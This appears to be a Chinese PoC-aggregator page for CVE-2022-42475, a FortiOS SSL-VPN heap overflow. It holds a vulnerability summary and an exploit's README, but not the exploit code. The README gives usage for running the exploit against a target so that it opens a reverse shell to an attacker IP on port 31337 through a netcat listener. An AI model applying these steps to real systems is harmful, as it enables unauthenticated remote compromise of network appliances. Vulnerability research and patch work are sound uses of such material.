关联漏洞
标题:
Fortinet FortiOS 缓冲区错误漏洞
(CVE-2022-42475)
描述:Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 Fortinet FortiOS 存在安全漏洞,该漏洞源于其SSL-VPN允许未经身份认证的远程攻击者通过精心制作的恶意请求实现堆缓冲区溢出导致任意代码或命令执行。
介绍
# cve-2022-42475
POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon
## Usage
**pip install pwntools**
To use this code, you can save it in a file, say exploit.py, and then run it with Python in the command line, passing in the required arguments. Here's an example command to run the exploit
> python exploit.py <target_host> <target_port> <reverse_ip> <command1> <command2>
Replace <target_host> with the hostname or IP address of the target system, <target_port> with the port number of the vulnerable service, and <reverse_ip> with the IP address of the machine you want to receive a shell on. The remaining arguments are the commands that you want to execute, separated by spaces.
For example, if the target system has IP address 192.168.0.100, the vulnerable service is running on port 8080, and you want to execute the ls and id commands, you would run the following command:
> python exploit.py 192.168.0.100 8080 192.168.0.101 id
This will create a reverse shell connection to 192.168.0.101:31337 and execute the ls and id commands on the target system. Note that you will need to have a listener running on the specified IP address and port to receive the reverse shell. You can use tools like ncat or netcat to create a listener.
文件快照
[4.0K] /data/pocs/35ee2bde001e2ddd2590cb19feee3d87320d1546
├── [1.7K] cve-2022-42475.py
└── [1.2K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。